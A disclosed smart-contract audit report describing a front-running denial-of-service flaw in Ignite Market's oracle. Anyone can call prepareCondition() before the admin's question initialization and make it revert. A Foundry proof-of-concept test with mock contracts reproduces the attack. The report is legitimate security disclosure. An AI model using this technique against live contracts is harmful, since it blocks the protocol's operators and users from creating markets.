'%3e%3cpath%20d='M12.4997%201.33325C10.39%201.33325%208.32772%201.95884%206.5736%203.13091C4.81947%204.30298%203.4523%205.96888%202.64496%207.91796C1.83763%209.86704%201.62639%2012.0118%202.03797%2014.0809C2.44955%2016.15%203.46545%2018.0506%204.95721%2019.5424C6.44897%2021.0342%208.34959%2022.0501%2010.4187%2022.4616C12.4878%2022.8732%2014.6326%2022.662%2016.5816%2021.8546C18.5307%2021.0473%2020.1966%2019.6801%2021.3687%2017.926C22.5408%2016.1719%2023.1663%2014.1096%2023.1663%2011.9999C23.1663%209.17094%2022.0425%206.45783%2020.0422%204.45745C18.0418%202.45706%2015.3287%201.33325%2012.4997%201.33325ZM12.4997%2021.3333C10.6537%2021.3333%208.84922%2020.7859%207.31436%2019.7603C5.7795%2018.7347%204.58322%2017.2771%203.8768%2015.5716C3.17039%2013.8662%202.98555%2011.9896%203.34568%2010.1791C3.70581%208.36859%204.59473%206.70554%205.90002%205.40025C7.20531%204.09496%208.86835%203.20605%2010.6788%202.84592C12.4893%202.48579%2014.3659%202.67063%2016.0714%203.37704C17.7768%204.08346%2019.2345%205.27974%2020.2601%206.8146C21.2856%208.34945%2021.833%2010.154%2021.833%2011.9999C21.833%2014.4753%2020.8497%2016.8492%2019.0993%2018.5996C17.349%2020.3499%2014.975%2021.3333%2012.4997%2021.3333Z'%20fill='white'/%3e%3cpath%20d='M19.167%208.06667C19.042%207.9425%2018.8731%207.8728%2018.697%207.8728C18.5208%207.8728%2018.3519%207.9425%2018.227%208.06667L10.8269%2015.4333L6.82695%2011.4333C6.70495%2011.3016%206.53562%2011.2237%206.35621%2011.2169C6.1768%2011.21%206.00201%2011.2747%205.87028%2011.3967C5.73856%2011.5187%205.66069%2011.688%205.65382%2011.8674C5.64694%2012.0468%205.71162%2012.2216%205.83362%2012.3533L10.8269%2017.3333L19.167%209.01333C19.2294%208.95136%2019.279%208.87762%2019.3129%208.79638C19.3467%208.71514%2019.3642%208.62801%2019.3642%208.54C19.3642%208.45199%2019.3467%208.36485%2019.3129%208.28361C19.279%208.20237%2019.2294%208.12864%2019.167%208.06667Z'%20fill='white'/%3e%3c/g%3e%3cdefs%3e%3cclipPath%20id='clip0_2790_31187'%3e%3crect%20width='24'%20height='24'%20fill='white'%20transform='translate(0.5)'/%3e%3c/clipPath%3e%3c/defs%3e%3c/svg%3e)
Ignite Market Disclosed Report
Audit report Ignite Market Audit ContestQuestion creation can be repeatedly reverted by front-running the id
Target
https://github.com/hackenproof-public/ignite-market-smart-contracts
Vulnerability Details
The IgniteOracle.sol contract is the main entry-point for creation of questions and their finalizations and voting. It does a bunch of necessary sanity checks for the provided question parameters and the protocol specific API sources, after which it invokes the ConditionalTokens.sol's prepareCondition(), providing the condition id, it's own address and the outcome slots. This is mostly forked logic, however it contains a front-running risk, due to:
prepareCondition()'s permissionless availability- Flare network's public mempool/pending transactions explorer
The core of the vulnerability is point 1, since looking the prepareCondition():
function prepareCondition(address oracle, bytes32 questionId, uint outcomeSlotCount) external {
require(outcomeSlotCount <= 256, "too many outcome slots");
require(outcomeSlotCount > 1, "there should be more than one outcome slot");
bytes32 conditionId = CTHelpers.getConditionId(oracle, questionId, outcomeSlotCount);
require(payoutNumerators[conditionId].length == 0, "condition already prepared");
payoutNumerators[conditionId] = new uint[](outcomeSlotCount);
emit ConditionPreparation(conditionId, oracle, questionId, outcomeSlotCount);
}
It does not do any check on the caller, as long as we provide valid parameters. However, the function itself makes sure that the provided question id has not been yet prepared. This opens up the possible path:
- The admin attempts to initialize a question and invokes
initializeQuestion()with the correct parameters and an arbitrary question id - The transaction occupies Flare's pending list, which any actor can observe
- A malicious actor sees the transaction and front-runs it via directly calling
ConditionalTokens#prepareCondition()and passing the oracle address, question id and outcome slots - The admin's transaction will fail due to the condition being already prepared
Since there is no question behind the arbitrarily prepared condition, it cannot be finalized nor voted for either, resulting in a DOS of the initialization for no cost, except for the gas it takes to front-run, which is fairly low on Flare
An article on the same vulnerability, found on the famous platform Polymarket, by Trust Security, can be found here: https://www.trust-security.xyz/post/no-more-bets
Validation steps
Below, there is a POC, written in Foundry, that utilizes mock contracts and minimalistic versions of the vulnerable contracts, in order to isolate only the logic that leads to the DOS. It showcases that preparing the condition before question initialization leads to a revert, which can be repeated indefinitely
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.26;
import "forge-std/Test.sol";
contract ConditionalTokensMock {
mapping(bytes32 => bool) public conditions;
function prepareCondition(address oracle, bytes32 questionId, uint outcomeSlotCount) external {
bytes32 conditionId = keccak256(abi.encodePacked(oracle, questionId, outcomeSlotCount));
require(!conditions[conditionId], "Condition already prepared");
conditions[conditionId] = true;
}
function reportPayouts(bytes32, uint[] calldata) external {
// noop
}
}
interface IJsonApiVerification {
function verifyJsonApi(bytes calldata proof) external view returns (bool);
}
interface IConditionalTokens {
function prepareCondition(address, bytes32, uint) external;
function reportPayouts(bytes32, uint[] calldata) external;
}
contract DummyVerification is IJsonApiVerification {
function verifyJsonApi(bytes calldata) external pure returns (bool) {
return true;
}
}
contract IgniteOracle {
enum Status { INVALID, ACTIVE, VOTING, FINALIZED }
struct Question {
Status status;
bool automatic;
uint outcomeSlotCount;
uint apiSources;
uint consensusPercent;
uint endTime;
uint resolutionTime;
uint[] apiResolution;
uint winnerIdx;
}
mapping(bytes32 => Question) public question;
IConditionalTokens public conditionalTokens;
constructor(address _ct) {
conditionalTokens = IConditionalTokens(_ct);
}
function initializeQuestion(
bytes32 questionId,
uint outcomeSlotCount,
uint consensusPercent,
uint endTime,
uint resolutionTime
) external {
require(question[questionId].status == Status.INVALID, "Already initialized");
require(outcomeSlotCount >= 2, "Invalid slots");
require(consensusPercent >= 51 && consensusPercent <= 100, "Invalid consensus");
require(endTime > block.timestamp, "End time past");
require(resolutionTime > endTime, "Resolution must be later");
question[questionId] = Question({
status: Status.ACTIVE,
automatic: false,
outcomeSlotCount: outcomeSlotCount,
apiSources: 0,
consensusPercent: consensusPercent,
endTime: endTime,
resolutionTime: resolutionTime,
apiResolution: new uint[](outcomeSlotCount),
winnerIdx: type(uint).max
});
conditionalTokens.prepareCondition(address(this), questionId, outcomeSlotCount);
}
}
contract PrepareConditionFrontRunTest is Test {
IgniteOracle public oracle;
ConditionalTokensMock public ct;
address attacker = address(0xBEEF);
bytes32 constant QID = keccak256("test-question");
uint256 constant SLOT_COUNT = 3;
function setUp() public {
ct = new ConditionalTokensMock();
oracle = new IgniteOracle(address(ct));
}
function testFrontRunPreventsInitialize() public {
// Simulate attacker front-running prepareCondition
vm.prank(attacker);
ct.prepareCondition(address(oracle), QID, SLOT_COUNT);
// Now attempt to initialize as the legitimate admin
vm.expectRevert("Condition already prepared");
oracle.initializeQuestion(
QID,
SLOT_COUNT,
80, // consensus
block.timestamp + 1 days, // endTime
block.timestamp + 2 days // resolutionTime
);
}
}
Attachments
hidden 
Comments on this report are hidden 
Details 
Participants (3) 
